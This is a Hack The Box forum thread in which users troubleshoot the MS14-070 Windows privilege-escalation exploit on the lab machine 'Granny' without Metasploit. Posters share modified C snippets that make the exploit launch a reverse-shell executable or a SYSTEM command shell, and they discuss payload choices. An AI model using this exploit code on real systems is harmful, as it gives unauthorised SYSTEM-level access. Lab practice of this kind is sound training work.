Granny privesc (MS14-070) WITHOUT meterpreter

aasaas
edited February 2018 in Exploits

Hi,

I try to pwn Granny again, without meterpreter. I'm stuck with privesc (MS14-070 : https://www.exploit-db.com/exploits/37755/).

I modify the exploit like this :

BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));

        // Start the child process.
        return CreateProcess (
                NULL,                                                           // No module name (use command line)
                //"c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
                "c:\\Inetpub\\wwwroot\\revshell.exe",   // Start reverse shell

                NULL,                                                           // Process handle not inheritable
                NULL,                                                           // Thread handle not inheritable
                TRUE,                                                           // Set handle inheritance to TRUE
                0,                                                              // No creation flags
                NULL,                                                           // Use parent's environment block
                NULL,                                                           // Use parent's starting directory
                &startupInformation[0],                                         // Pointer to STARTUPINFO structure
                &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
        );
}

When I execute this exploit from cmd.exe (or command shell from meterpreter), it spawns a reverse shell but dies just after. No matter what payload I use (meterpreter, windows_reverse_shell, ncat.exe, etc).

But, when I execute -f MS14-070.exe from meterpreter, it opens just fine.

How can I have the same behaviour than meterpreter's execute -f for cmd.exe ?

In this video, the user has the exact same problem (he finally managed to have reverse shell, but used meterpreter's execute -f command) :

aas

Tagged:

Comments

  • thed4vethed4ve

    Hey man, I'm stucked at the same point. Did you find a way to solve it?

    Hack The Box

    Message me with 1) Problem description 2) What did you try so far? 3) Your ideas about next steps

    If you appreciate my help, please give me +1 respect
    https://www.hackthebox.eu/home/users/profile/57582

  • scud78scud78
    `cmd /K` or `start`
  • hackerintshellhackerintshell

    Hi,

    try this:

    
BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        startupInformation->lpDesktop = "WinSta0\\Default";
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));

        LPTSTR lpComspec;
        lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
        GetEnvironmentVariable("comspec", lpComspec, 1024); 

        return CreateProcess (
                lpComspec,
                NULL,
                NULL,
                NULL,
                TRUE,
                0,
                NULL,
                NULL,
                &startupInformation[0],
                &processInformation[0]
        );
}

  • scud78scud78
    @hackerintshell that will only work if you have an interactive session, meaning remote desktop or at the actual keyboard. And it would only pop a console window, not actually run anything else.

    The issue is the /C, which closes the console as soon as the command has run, terminating any threads living in the background. /K will keep it open, along with any children it's started.
  • hackerintshellhackerintshell
    edited December 2019

    @scud78 I tried it now and it worked for me. The EoP was made in the same reverse shell.

  • scud78scud78
    @hackerintshell how? %comspec% is just cmd, and you're not passing any arguments.
  • csukicsuki

    @hackerintshell I just logged in to thank you, it works! :)

  • peekpeek

    could you upload the binary ?

    peek

  • rhinokeyrhinokey

    I've spent around 3 hours today fighting with this box without MSF. Like others, I'm heading toward the OSCP and am doing my best to avoid Metasploit.

    It can be done. My experience was buggy, the reverse shell would time out each time in under a minute. You need the churrasco exploit. The forum keeps blocking me if I try to give any more detail.

  • denvhattdenvhatt
    @hackerintshell Amazing! It works.

    It would be really nice if you can explain the details of this change, why this is needed. It seams like it needs some kind of desktop env session?

    I will give you my respect! Thanks
Sign In to comment.